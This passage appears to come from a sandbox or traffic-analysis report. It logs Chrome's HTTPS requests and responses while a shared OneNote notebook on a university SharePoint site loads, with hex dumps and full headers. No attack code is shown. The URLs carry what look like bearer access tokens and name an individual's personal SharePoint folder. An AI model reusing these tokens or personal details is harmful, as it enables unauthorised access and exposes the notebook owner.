                                                2022-10-03 13:38:18 UTC323INData Raw: 30 30 22 2c 22 49 64 22 3a 22 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 36 35 22 2c 22 52 65 6c 61 74 69 76 65 50 61 74 68 22 3a 6e 75 6c 6c 2c 22 49 73 46 6f 6c 64 65 72 43 65 6c 6c 22 3a 66 61 6c 73 65 2c 22 4f 70 73 22 3a 5b 5d 7d 2c 7b 22 42 61 73 65 49 64 22 3a 22 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 36 35 22 2c 22 4f 62 6a 65 63 74 47 72 6f 75 70 73 22 3a 5b 7b 22 49 64 22 3a 22 38 66 31 30 39 38 32 30 2d 30 32 32 34 2d 34 65 39 37 2d 62 61 36 35 2d 61 38 64 64 64 63 32 33 38 36 31 65 7c 31 22 2c 22 4f 62 6a 65 63 74 73 22 3a 5b 7b 22 43 6c 61 73 73 49 64 22 3a 35 32 34 33 34 35 2c 22 4f 62 6a 65 63 74 49 64
                                                Data Ascii: 00","Id":"c9bd634a-a438-466f-9489-9b64a2837d20|65","RelativePath":null,"IsFolderCell":false,"Ops":[]},{"BaseId":"c9bd634a-a438-466f-9489-9b64a2837d20|65","ObjectGroups":[{"Id":"8f109820-0224-4e97-ba65-a8dddc23861e|1","Objects":[{"ClassId":524345,"ObjectId
                                                2022-10-03 13:38:18 UTC331INData Raw: 4d 7a 6b 31 4d 7a 6b 77 59 32 49 35 4d 57 51 7a 49 69 77 69 61 58 4e 7a 49 6a 6f 69 4d 44 41 77 4d 44 41 77 4d 44 4d 74 4d 44 41 77 4d 43 30 77 5a 6d 59 78 4c 57 4e 6c 4d 44 41 74 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 51 44 6b 77 4d 54 51 77 4d 54 49 79 4c 54 67 31 4d 54 59 74 4d 54 46 6c 4d 53 30 34 5a 57 5a 6d 4c 54 51 35 4d 7a 41 30 4f 54 49 30 4d 44 45 35 59 69 49 73 49 6d 35 69 5a 69 49 36 49 6a 45 32 4e 6a 51 33 4f 54 67 33 4d 54 63 69 4c 43 4a 6c 65 48 41 69 4f 69 49 78 4e 6a 59 30 4f 44 4d 30 4e 7a 45 33 49 69 77 69 62 6d 46 74 5a 57 6c 6b 49 6a 6f 69 4d 43 4d 75 5a 6e 78 74 5a 57 31 69 5a 58 4a 7a 61 47 6c 77 66 48 56 79 62 69 55 7a 59 58 4e 77 62 79 55 7a 59 57 46 75 62 32 34 6a 4e 47 4d 79 59 6d 52 6c 4d 32 52 6a 4e 6d 59 78 59 6d 52
                                                Data Ascii: Mzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ3OTg3MTciLCJleHAiOiIxNjY0ODM0NzE3IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmR
                                                2022-10-03 13:38:18 UTC339INData Raw: 64 22 3a 22 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 34 32 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 34 30 32 36 36 30 37 32 37 2c 22 31 36 36 34 37 39 38 36 39 39 30 30 30 22 2c 35 33 36 38 37 38 34 35 37 2c 22 7b 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7d 7b 34 33 7d 22 5d 7d 2c 7b 22 43 6c 61 73 73 49 64 22 3a 33 39 33 32 32 39 2c 22 4f 62 6a 65 63 74 49 64 22 3a 22 63 39 62 64 36 33 34 61 2d 61 34 33 38 2d 34 36 36 66 2d 39 34 38 39 2d 39 62 36 34 61 32 38 33 37 64 32 30 7c 37 31 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 32 30 31 33 33 33 37 36 33 2c 22 31 22 2c 33 33 35 35 35 31 37 35 33 2c 22 31 36 36
                                                Data Ascii: d":"c9bd634a-a438-466f-9489-9b64a2837d20|42","Properties":[402660727,"1664798699000",536878457,"{c9bd634a-a438-466f-9489-9b64a2837d20}{43}"]},{"ClassId":393229,"ObjectId":"c9bd634a-a438-466f-9489-9b64a2837d20|71","Properties":[201333763,"1",335551753,"166
                                                2022-10-03 13:38:18 UTC347INData Raw: 30 30 33 45 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 75 30 30 32 32 4f 75 74 6c 69 6e 65 52 65 73 69 7a 65 48 61 6e 64 6c 65 43 6f 6e 74 61 69 6e 65 72 5c 75 30 30 32 32 5c 75 30 30 33 45 5c 75 30 30 33 43 5c 75 30 30 32 46 73 70 61 6e 5c 75 30 30 33 45 5c 75 30 30 33 43 5c 75 30 30 32 46 64 69 76 5c 75 30 30 33 45 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 75 30 30 32 32 4f 75 74 6c 69 6e 65 43 6f 6e 74 65 6e 74 5c 75 30 30 32 32 20 73 74 79 6c 65 3d 5c 75 30 30 32 32 77 69 64 74 68 3a 36 32 34 70 78 3b 5c 75 30 30 32 32 5c 75 30 30 33 45 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 75 30 30 32 32 4f 75 74 6c 69 6e 65 45 6c 65 6d 65 6e 74 20 4c 74 72 5c 75 30 30 32 32 20 64 61 74 61 2d 6e 6f 64 65 69 64 3d 5c 75 30 30 32 32 7b
                                                Data Ascii: 003E\u003Cspan class=\u0022OutlineResizeHandleContainer\u0022\u003E\u003C\u002Fspan\u003E\u003C\u002Fdiv\u003E\u003Cdiv class=\u0022OutlineContent\u0022 style=\u0022width:624px;\u0022\u003E\u003Cdiv class=\u0022OutlineElement Ltr\u0022 data-nodeid=\u0022{
                                                2022-10-03 13:38:18 UTC355INData Raw: 5c 75 30 30 32 46 56 50 6c 45 71 62 64 5a 59 72 5c 75 30 30 32 46 6f 36 72 48 4e 5a 53 75 6c 51 48 73 7a 78 6d 72 6b 44 6a 4c 6a 75 58 71 41 4d 5a 57 41 7a 6c 49 45 52 58 6f 44 4e 55 41 62 6a 35 42 38 4c 35 54 78 6e 48 70 4a 51 64 66 6b 5a 6b 62 33 74 53 32 4b 50 49 42 53 34 67 35 43 45 34 69 52 6a 6f 66 68 48 49 62 61 33 5c 75 30 30 32 46 5c 75 30 30 32 46 71 55 70 57 4f 68 68 6f 64 4b 42 78 7a 5a 38 46 42 4e 64 4b 50 79 4c 30 74 6e 62 4b 77 6c 54 49 45 5a 44 57 33 31 4c 73 41 49 35 53 35 68 49 46 54 6e 4f 56 6e 6a 31 52 5a 54 68 46 59 6f 61 70 4e 43 4c 61 4c 6e 49 5c 75 30 30 32 46 41 6c 32 63 6b 4a 6c 51 5c 75 30 30 32 42 4c 58 73 4a 34 52 6a 79 57 55 4a 33 73 37 34 59 34 51 68 30 30 47 6a 76 30 4e 52 4b 71 51 79 57 79 34 66 36 46 68 45 72 7a 6d 57 31
                                                Data Ascii: \u002FVPlEqbdZYr\u002Fo6rHNZSulQHszxmrkDjLjuXqAMZWAzlIERXoDNUAbj5B8L5TxnHpJQdfkZkb3tS2KPIBS4g5CE4iRjofhHIba3\u002F\u002FqUpWOhhodKBxzZ8FBNdKPyL0tnbKwlTIEZDW31LsAI5S5hIFTnOVnj1RZThFYoapNCLaLnI\u002FAl2ckJlQ\u002BLXsJ4RjyWUJ3s74Y4Qh00Gjv0NRKqQyWy4f6FhErzmW1


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                11192.168.2.34974013.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:19 UTC363OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-BrowserUlsBeacon: [{"Index":3,"MsSinceStart":1290,"Value":"Get cells response received:200","Type":"BootLogs"}]
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:19 UTC365INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 936f3afe-9a1e-4904-b251-31a044261cd9
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006C5
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006C5
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 9B5657464AD342D2A8067DA7B05F0E68 Ref B: AMS231032608029 Ref C: 2022-10-03T13:38:19Z
                                                Date: Mon, 03 Oct 2022 13:38:19 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                12192.168.2.34974213.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:20 UTC366OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-BrowserUlsBeacon: [{"Index":4,"MsSinceStart":1309,"Value":"Launching FastView from entry point WacBootGetCells","Type":"BootLogs"},{"Index":5,"MsSinceStart":1313,"Value":"RecordContentDisplayed","Type":"BootPhaseCompleted"}]
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:20 UTC367INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: b37c0209-c33b-474d-ad0c-e085b0af1b44
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000094C6
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000094C6
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 8ACA5ECC30D54F39BB742C213396F9DA Ref B: AMS231032605019 Ref C: 2022-10-03T13:38:20Z
                                                Date: Mon, 03 Oct 2022 13:38:19 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                13192.168.2.34974413.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:20 UTC369OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-BrowserUlsBeacon: [{"Index":6,"MsSinceStart":2627,"Value":"SplashScreenShown","Type":"BootPhaseCompleted"}]
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:20 UTC370INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 8b8c15c7-7537-473a-8fdb-89eb85deff05
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF00000699
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF00000699
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_onenoteslice,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: FAD1D0C59745434EA63F06DC41C10908 Ref B: AMS231032602005 Ref C: 2022-10-03T13:38:20Z
                                                Date: Mon, 03 Oct 2022 13:38:19 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                14192.168.2.34975313.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:20 UTC371OUTPOST /o/OneNoteS2SHandler.ashx?action=educationuser&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: false
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:21 UTC375INHTTP/1.1 200 OK
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=utf-8
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 1d5dfee8-7aa1-469f-9a03-2f3fca666c33
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006B9
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006B9
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_excelslice_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: CC7917578C5D4AD0B2215D7FABB11927 Ref B: AMS231032606007 Ref C: 2022-10-03T13:38:20Z
                                                Date: Mon, 03 Oct 2022 13:38:20 GMT
                                                Connection: close
                                                2022-10-03 13:38:21 UTC376INData Raw: 62 64 0d 0a 7b 22 52 65 73 70 6f 6e 73 65 73 22 3a 5b 5b 36 30 2c 7b 22 69 73 45 64 75 63 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 69 73 54 65 61 63 68 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 53 74 75 64 65 6e 74 22 3a 66 61 6c 73 65 2c 22 69 73 4f 33 36 35 53 75 62 73 63 72 69 62 65 72 22 3a 66 61 6c 73 65 2c 22 4f 70 65 72 61 74 69 6f 6e 49 64 22 3a 30 2c 22 53 74 61 74 75 73 43 6f 64 65 22 3a 30 2c 22 52 61 77 43 65 6c 6c 53 74 6f 72 61 67 65 45 72 72 6f 72 43 6f 64 65 22 3a 22 22 2c 22 53 65 72 76 65 72 50 61 67 65 53 74 61 74 73 54 72 61 63 65 22 3a 22 22 7d 5d 5d 7d 0d 0a
                                                Data Ascii: bd{"Responses":[[60,{"isEducation":false,"isTeacher":false,"isStudent":false,"isO365Subscriber":false,"OperationId":0,"StatusCode":0,"RawCellStorageErrorCode":"","ServerPageStatsTrace":""}]]}
                                                2022-10-03 13:38:21 UTC376INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                15192.168.2.34976713.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:21 UTC376OUTGET /o/GetImage.ashx?&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffiles%2F924d3cd4da7e4e62a9e70ac99fd2a5dd&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTgiLCJleHAiOiIxNjY0ODQwMjk4IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjkyNGQzY2Q0ZGE3ZTRlNjJhOWU3MGFjOTlmZDJhNWRkO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDs5MDhkNG